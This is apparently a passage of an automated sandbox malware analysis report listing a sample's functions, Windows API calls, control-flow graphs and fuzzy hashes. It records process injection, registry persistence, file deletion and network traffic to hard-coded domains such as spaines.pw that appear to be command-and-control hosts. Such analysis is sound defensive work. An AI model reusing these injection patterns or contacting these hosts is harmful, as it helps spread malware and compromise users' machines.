                                                                                                                                                                • lstrcat.KERNEL32(0339298A,03392659), ref: 03392666
                                                                                                                                                                • lstrcat.KERNEL32(0339298A,0339298A), ref: 03392679
                                                                                                                                                                  • Part of subcall function 03392597: lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                • String ID: \AC\
                                                                                                                                                                • API String ID: 2903145849-1749977576
                                                                                                                                                                • Opcode ID: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
                                                                                                                                                                • Instruction ID: 9db000ec688731e0cd26892cd1dc539b2b1922b7304f511ec4c4c5bfbb5c1e7a
                                                                                                                                                                • Opcode Fuzzy Hash: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
                                                                                                                                                                • Instruction Fuzzy Hash: 7A111971500948FFEF02DF60CC89EAEBBB8EF11744F1844AAE945EE021D7718A51DB95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 033929DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 260 33929dd-3392a1a call 3393653 lstrcat call 3392501 call 3392a14 call 3393653 lstrcat 270 3392a20-3392a2b call 3392b4d 260->270 272 3392a30-3392a43 call 33934f7 270->272 274 3392a48-3392a4f 272->274 274->270 275 3392a51-3392a6d call 339343f call 3392683 274->275 280 3392a9a-3392ab1 call 3392683 275->280 281 3392a6f 275->281 286 3392ade-3392af5 call 3392683 280->286 287 3392ab3 280->287 281->280 282 3392a71-3392a86 call 33926f9 281->282 282->280 291 3392a88 282->291 296 3392af8-3392b11 call 3392e97 286->296 297 3392af7 286->297 287->286 289 3392ab5-3392aca call 33926f9 287->289 289->286 298 3392acc 289->298 291->280 294 3392a8a-3392a94 DeleteFileA 291->294 294->280 302 3392b13-3392b1c call 3393057 296->302 303 3392b34-3392b48 Sleep 296->303 297->296 298->286 300 3392ace-3392ad8 DeleteFileA 298->300 300->286 302->303 306 3392b1e-3392b2e DeleteFileA 302->306 303->274 306->303
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,033929D4), ref: 033929E3
                                                                                                                                                                  • Part of subcall function 03392A14: lstrcat.KERNEL32(00000000,03392A0B), ref: 03392A1A
                                                                                                                                                                  • Part of subcall function 03392A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392A94
                                                                                                                                                                  • Part of subcall function 03392A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392AD8
                                                                                                                                                                  • Part of subcall function 03392A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 03392B2E
                                                                                                                                                                  • Part of subcall function 03392A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4261675396-0
                                                                                                                                                                • Opcode ID: 7f63560f243963457db3ff63725a4164d9a7c5e5f62613537768b102b2fc6caa
                                                                                                                                                                • Instruction ID: 0aae8976832be2c1f5dd80a4f40b5fe40a9e3a07ca68ab337cb716a98034006f
                                                                                                                                                                • Opcode Fuzzy Hash: 7f63560f243963457db3ff63725a4164d9a7c5e5f62613537768b102b2fc6caa
                                                                                                                                                                • Instruction Fuzzy Hash: 6C41367680171CEEEF22EB61CDC4BAB76FCEF40705F054897A945EA051DE749580CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03392F38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 327 3392f38-3392f3b 328 3392f3d 327->328 329 3392fb1-3392ffc call 339363b send 327->329 328->329 333 3392ffe 329->333 334 3393042-3393054 closesocket 329->334 335 3393001-3393015 send 333->335 335->334 336 3393017-339301c 335->336 336->335 337 339301e-3393023 336->337 338 3393026-3393038 recv 337->338 338->334 339 339303a-339303e 338->339 339->338 340 3393040 339->340 340->334
                                                                                                                                                                APIs
                                                                                                                                                                • send.WS2_32(?,00000000,00000000,00000000), ref: 03392FF4
                                                                                                                                                                • send.WS2_32(?,03392A30,03392A2C,00000000), ref: 0339300D
                                                                                                                                                                • recv.WS2_32(?,03392A30,00A00000,00000000), ref: 03393030
                                                                                                                                                                • closesocket.WS2_32(?), ref: 0339304A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: send$closesocketrecv
                                                                                                                                                                • String ID: gfnlmtcolrrb.pw
                                                                                                                                                                • API String ID: 3431254638-1614117810
                                                                                                                                                                • Opcode ID: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
                                                                                                                                                                • Instruction ID: b812975e2401362ab2df58f66e8f07df07af5f52e45ecf44ac7da1324a549e38
                                                                                                                                                                • Opcode Fuzzy Hash: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
                                                                                                                                                                • Instruction Fuzzy Hash: 83118176B00014EBEF129E28CC84B967BF8EF44794F0941D5FF09EA115E335E9108BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03392535 Relevance: 7.6, APIs: 5, Instructions: 95stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • ExpandEnvironmentStringsA.KERNELBASE(03392525,00000010,?,?,033929F8,00000104), ref: 0339253A
                                                                                                                                                                  • Part of subcall function 03392572: lstrcat.KERNEL32(033929F8,03392553), ref: 0339257A
                                                                                                                                                                  • Part of subcall function 03392572: lstrcat.KERNEL32(033929F8,00000000), ref: 0339258D
                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(033925BB,0000000B,?,00000000,03392634,00000104), ref: 033925CB
                                                                                                                                                                • lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2903145849-0
                                                                                                                                                                • Opcode ID: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
                                                                                                                                                                • Instruction ID: 3ef123170d4f1c5abdef0fb9e3fa4f8607bb01ecc4f8a96ec07e4a471422ec03
                                                                                                                                                                • Opcode Fuzzy Hash: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
                                                                                                                                                                • Instruction Fuzzy Hash: 1C31E771048685EFEF03DF60CC969EA7B68FF02308B0844ABE985DE063D6744557CBA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03392A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 362 3392a14-3392a1a call 3393653 lstrcat 365 3392a20-3392a2b call 3392b4d 362->365 367 3392a30-3392a43 call 33934f7 365->367 369 3392a48-3392a4f 367->369 369->365 370 3392a51-3392a6d call 339343f call 3392683 369->370 375 3392a9a-3392ab1 call 3392683 370->375 376 3392a6f 370->376 381 3392ade-3392af5 call 3392683 375->381 382 3392ab3 375->382 376->375 377 3392a71-3392a86 call 33926f9 376->377 377->375 386 3392a88 377->386 391 3392af8-3392b11 call 3392e97 381->391 392 3392af7 381->392 382->381 384 3392ab5-3392aca call 33926f9 382->384 384->381 393 3392acc 384->393 386->375 389 3392a8a-3392a94 DeleteFileA 386->389 389->375 397 3392b13-3392b1c call 3393057 391->397 398 3392b34-3392b48 Sleep 391->398 392->391 393->381 395 3392ace-3392ad8 DeleteFileA 393->395 395->381 397->398 401 3392b1e-3392b2e DeleteFileA 397->401 398->369 401->398
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,03392A0B), ref: 03392A1A
                                                                                                                                                                  • Part of subcall function 03392B4D: inet_addr.WS2_32(00000000), ref: 03392BDA
                                                                                                                                                                  • Part of subcall function 03392B4D: gethostbyname.WS2_32(00000000), ref: 03392BEE
                                                                                                                                                                  • Part of subcall function 03392B4D: Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 03392C44
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392A94
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 03392B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$Sleep$gethostbynameinet_addrlstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1642945479-0
                                                                                                                                                                • Opcode ID: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                • Instruction ID: 56cb2eefb0b6d91cf8678c3f992a1079f646545bac2468ab5b4d4a73bdbb3a52
                                                                                                                                                                • Opcode Fuzzy Hash: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                • Instruction Fuzzy Hash: 5231357690171DEEEF22EB21CDC8BAB76FCEF40705F0508A7A945EA044DE749580CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03392B4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138sleepnetworkCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 402 3392b4d-3392b57 403 3392b5e-3392b62 402->403 404 3392b8b-3392b9b 403->404 405 3392b64-3392b89 call 3393673 403->405 407 3392b9d-3392ba0 404->407 410 3392bd0-3392be2 inet_addr 405->410 407->407 409 3392ba2-3392ba8 407->409 411 3392bad-3392bb6 409->411 412 3392c03-3392c3c call 3393673 410->412 413 3392be4-3392bf6 gethostbyname 410->413 414 3392bb8-3392bba 411->414 415 3392bbc-3392bbe 411->415 421 3392c41-3392c4f Sleep 412->421 413->403 416 3392bfc-3392c01 413->416 414->415 418 3392bc0-3392bc1 414->418 415->411 416->412 418->411 419 3392bc3-3392bcf 418->419 419->410 421->421 422 3392c51-3392c85 call 3393673 call 3392399 call 3392e97 421->422 428 3392c8a-3392ca2 call 3392c99 call 339379f 422->428 428->403 433 3392ca8-3392cad 428->433 433->403 434 3392cb3-3392cbc 433->434 434->403 435 3392cc2-3392cc5 434->435 435->403 436 3392ccb-3392cd1 435->436 437 3392cde-3392cf1 call 3392cfc 436->437 438 3392cd3-3392cd8 436->438 437->403 441 3392cf7-3392cf9 437->441 438->403 438->437
                                                                                                                                                                APIs
                                                                                                                                                                • inet_addr.WS2_32(00000000), ref: 03392BDA
                                                                                                                                                                • gethostbyname.WS2_32(00000000), ref: 03392BEE
                                                                                                                                                                • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 03392C44
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                • String ID: spaines.pw
                                                                                                                                                                • API String ID: 4125869991-3306378189
                                                                                                                                                                • Opcode ID: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                • Instruction ID: b181dd527ced3fa708be06f317dcbd72a32207def5a940ac14dc63451225dbe1
                                                                                                                                                                • Opcode Fuzzy Hash: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                • Instruction Fuzzy Hash: CE41F376500608FEFF11EF24C8C4BABBBEDEF44700F098996E845EF146DA309645CAA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03392C99 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107sleepnetworkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • inet_addr.WS2_32(00000000), ref: 03392BDA
                                                                                                                                                                • gethostbyname.WS2_32(00000000), ref: 03392BEE
                                                                                                                                                                • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 03392C44
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                • String ID: spaines.pw
                                                                                                                                                                • API String ID: 4125869991-3306378189
                                                                                                                                                                • Opcode ID: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                • Instruction ID: 9422f252e16316ab400cd7635f7f74293f609fbb73af1c833d0f20cd018e1ff5
                                                                                                                                                                • Opcode Fuzzy Hash: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                • Instruction Fuzzy Hash: 68318076500608FEFF12EF24C8C4FAAB7ECEF44710F098996E945EF145EA309544CAA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03390811 Relevance: 6.1, APIs: 4, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0339086E: RegCreateKeyExA.KERNELBASE(00000000,03390840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 03390876
                                                                                                                                                                  • Part of subcall function 0339086E: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 0339089D
                                                                                                                                                                  • Part of subcall function 0339086E: RegCloseKey.KERNELBASE(?), ref: 033908A9
                                                                                                                                                                • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 03390900
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$CloseThreadValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 711899537-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 5642f87f2a1790174f3677f186574113534f0f7cb64971d423b3a4a4c4816fa2
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: A631F476914305EFFF05BB709DC6ABA7BACEF00301F0401A7BD95EE0A5EA3049548AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03390B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(03390B57,0000000E), ref: 03390B6A
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 03390B77
                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 03390B84
                                                                                                                                                                  • Part of subcall function 03390DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,03390D88,00000000,0000090B,00000000), ref: 03390E06
                                                                                                                                                                  • Part of subcall function 03390DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 03390E24
                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 03390BA6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3233011861-0
                                                                                                                                                                • Opcode ID: 1c0a6b39f04f013888fd52650cb507d7030a6be19416d1a6354875ae22fce905
                                                                                                                                                                • Instruction ID: 517b82a383c2e7a4812e6ea851679648a792afa251caaa5788cf142487583aa6
                                                                                                                                                                • Opcode Fuzzy Hash: 1c0a6b39f04f013888fd52650cb507d7030a6be19416d1a6354875ae22fce905
                                                                                                                                                                • Instruction Fuzzy Hash: CE11BF79A44341AEFF19AB70DDD4A667F6DAF42704B1D4097E845AE0A3DA20C4029B38
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03392683 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0339269E
                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 033926B7
                                                                                                                                                                • ReadFile.KERNELBASE(0339298A,?,00000000,?,00000000), ref: 033926DB
                                                                                                                                                                • CloseHandle.KERNEL32(0339298A), ref: 033926EC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3919263394-0
                                                                                                                                                                • Opcode ID: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
                                                                                                                                                                • Instruction ID: 013107c205aee1ace5d4d138f750ae80e2a7ecab0006067a52581bd7f0a62538
                                                                                                                                                                • Opcode Fuzzy Hash: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
                                                                                                                                                                • Instruction Fuzzy Hash: 9701EC30641609FFFF11DF60CC85B9DBAB8EF05B44F2445AAAA14F91E0D7709A209B54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 033926F9 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 03392715
                                                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 03392732
                                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0339274E
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0339275F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3604237281-0
                                                                                                                                                                • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
                                                                                                                                                                • Instruction ID: 954f9f7e3452b866f7d1e50acb5c721ba48d100d448d6c0de9ae90a38e6509ad
                                                                                                                                                                • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
                                                                                                                                                                • Instruction Fuzzy Hash: E101E430640209FFEF119FA0CC85F8EBEB8AF04B04F1041A9BA14F91E1D770AA21AB54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03391345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 03391372
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 03391387
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 033913E5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 3883c34fb4642d7b07f3e355823c27fce38063dcb45b78d8411dee102c9a8a00
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 3A218E31904216AFEF11DE78C884B5DBBB5AF08700F094216F955BB594D770A810CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03390B6B Relevance: 4.5, APIs: 3, Instructions: 22threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 03390B77
                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 03390B84
                                                                                                                                                                  • Part of subcall function 03390DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,03390D88,00000000,0000090B,00000000), ref: 03390E06
                                                                                                                                                                  • Part of subcall function 03390DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 03390E24
                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 03390BA6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$AllocExitMemoryOpenThreadVirtualWindowWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2938372061-0
                                                                                                                                                                • Opcode ID: 1059d9524711834fbe5d8e118d96b44bb8c4a827e91fa872819f30df3597f232
                                                                                                                                                                • Instruction ID: 544d43924afc4364f839cb1089d5796b1feeb96042ed713d1849405105a05a57
                                                                                                                                                                • Opcode Fuzzy Hash: 1059d9524711834fbe5d8e118d96b44bb8c4a827e91fa872819f30df3597f232
                                                                                                                                                                • Instruction Fuzzy Hash: D3E04674680242AAFF106AA18CCAB9A3E5C6F04759F0C0195FE85BE0E7CA60C1468678
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0339086E Relevance: 4.5, APIs: 3, Instructions: 18registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(00000000,03390840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 03390876
                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 0339089D
                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 033908A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1818849710-0
                                                                                                                                                                • Opcode ID: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
                                                                                                                                                                • Instruction ID: 87870edc1d6f624e05b5c4127835a91d2502852ea00b4b25273aa0ee75b5fd76
                                                                                                                                                                • Opcode Fuzzy Hash: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
                                                                                                                                                                • Instruction Fuzzy Hash: 4AE01272100008BFEF026F60DC89A983B75EF44308F0480A1FE4AAD075CBB18AA0DF68
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 033908D9 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 03390643: CreateMutexA.KERNELBASE(00000000,00000000), ref: 0339065A
                                                                                                                                                                  • Part of subcall function 03390643: LoadLibraryA.KERNELBASE(03390673,00000009,?,00000000), ref: 03390681
                                                                                                                                                                  • Part of subcall function 03390643: lstrcmpiA.KERNEL32(?,00000000), ref: 033906EB
                                                                                                                                                                  • Part of subcall function 03390643: Sleep.KERNELBASE(00001388), ref: 033906FE
                                                                                                                                                                  • Part of subcall function 03390643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
                                                                                                                                                                  • Part of subcall function 03390643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
                                                                                                                                                                  • Part of subcall function 03390643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390752
                                                                                                                                                                  • Part of subcall function 03390643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390764
